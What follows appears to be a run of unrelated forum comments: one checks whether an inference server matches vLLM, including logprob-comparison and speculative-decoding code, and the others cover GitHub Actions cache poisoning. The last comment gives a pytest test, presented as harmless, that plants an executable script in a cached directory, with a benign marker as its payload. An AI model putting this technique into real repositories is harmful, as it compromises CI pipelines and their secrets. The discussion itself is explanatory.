Why do they need to run benchmarks to confirm performance? Can't they run a set of example prompts and verify they get the exact same output token probabilities for every prompt? The fact that they aren't doing this makes me suspicious that they are not, in fact, doing exactly the same thing as vLLM.
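To make that concrete, a check along these lines would do it, assuming both servers expose an OpenAI-compatible /v1/completions endpoint the way vLLM does (the ports and model name here are made-up placeholders, and I compare with a small tolerance rather than bitwise equality, since different kernels can reorder floating-point sums):

```python
# Sketch: send the same prompt to two inference servers and compare the
# per-token log-probabilities they return. Assumes both speak the
# OpenAI-compatible completions API; ports/model are hypothetical.
import requests

BODY = {
    "model": "meta-llama/Llama-3.1-8B",  # placeholder model name
    "prompt": "The quick brown fox",
    "max_tokens": 32,
    "temperature": 0.0,  # greedy decoding so the streams are comparable
    "logprobs": 1,       # ask the server to return per-token logprobs
}

def token_logprobs(base_url: str):
    r = requests.post(f"{base_url}/v1/completions", json=BODY, timeout=60)
    r.raise_for_status()
    lp = r.json()["choices"][0]["logprobs"]
    return list(zip(lp["tokens"], lp["token_logprobs"]))

a = token_logprobs("http://localhost:8000")  # reference vLLM
b = token_logprobs("http://localhost:8001")  # implementation under test
for (tok_a, lp_a), (tok_b, lp_b) in zip(a, b):
    if tok_a != tok_b or abs(lp_a - lp_b) > 1e-5:
        print(f"diverged: {tok_a!r}@{lp_a:.6f} vs {tok_b!r}@{lp_b:.6f}")
        break
else:
    print("token streams and logprobs match")
```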
It's also a bit odd that they aren't incorporating speculative decoding; that seems like a critical performance optimization, especially for decode-heavy workloads.
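For reference, here's a rough sketch of the greedy variant of speculative decoding, just to show why it pays off when decode dominates: the target model verifies K drafted tokens in one forward pass instead of K sequential ones. `draft_next` and `target_logits` are hypothetical stand-ins for real model calls, not anything from their codebase:

```python
from typing import Callable, List

def speculative_step(
    tokens: List[int],
    draft_next: Callable[[List[int]], int],                   # cheap draft model: next greedy token
    target_logits: Callable[[List[int]], List[List[float]]],  # target model: logits per position
    k: int = 4,
) -> List[int]:
    # 1. Draft K candidate tokens autoregressively with the cheap model.
    draft, ctx = [], list(tokens)
    for _ in range(k):
        t = draft_next(ctx)
        draft.append(t)
        ctx.append(t)

    # 2. Score the whole extended sequence with ONE target forward pass.
    logits = target_logits(tokens + draft)

    # 3. Accept the longest prefix where the target's greedy choice agrees
    #    with the draft; at the first disagreement, emit the target's own
    #    token instead, so every step makes progress.
    accepted = []
    for i, t in enumerate(draft):
        pos = len(tokens) + i - 1  # logits at pos predict the token at pos+1
        target_choice = max(range(len(logits[pos])), key=logits[pos].__getitem__)
        if target_choice == t:
            accepted.append(t)
        else:
            accepted.append(target_choice)
            break
    else:
        # All K drafts accepted: the last position's logits give one
        # extra token for free.
        accepted.append(max(range(len(logits[-1])), key=logits[-1].__getitem__))
    return tokens + accepted
```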
IMO the core of the issue is the awful GitHub Actions cache design. Look at the recommendations for avoiding an attack by this extremely pernicious proof-of-concept malware: https://github.com/AdnaneKhan/Cacheract?tab=readme-ov-file#g.... How easy is it to mess this up when designing an action?
The LLM is a cute way to carry out this vulnerability, but in fact it's very easy to get code execution and poison a cache without any LLM, for example by executing code in the context of a unit test.
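For example, something as innocuous-looking as this (a hypothetical pytest test; the cached path is my assumption, not taken from Cacheract) runs before the workflow's cache-save step and can plant whatever it wants in the cached directory:

```python
# Sketch: arbitrary code running during CI -- here disguised as a test in a
# pull request -- executes before actions/cache saves the cache, so it can
# overwrite a "trusted" cached artifact. The payload is a harmless marker
# here; a real attacker's would not be.
import os
import pathlib

def test_build_artifacts_exist():
    cache_dir = pathlib.Path.home() / ".cache" / "build"  # assumed cached path
    cache_dir.mkdir(parents=True, exist_ok=True)

    payload = cache_dir / "setup_env.sh"
    payload.write_text("#!/bin/sh\necho poisoned-cache\n")
    os.chmod(payload, 0o755)

    assert payload.exists()  # looks like an ordinary passing test
```

When that cache entry is later restored in a more privileged context, say a run on the default branch with access to secrets, the planted file gets trusted implicitly.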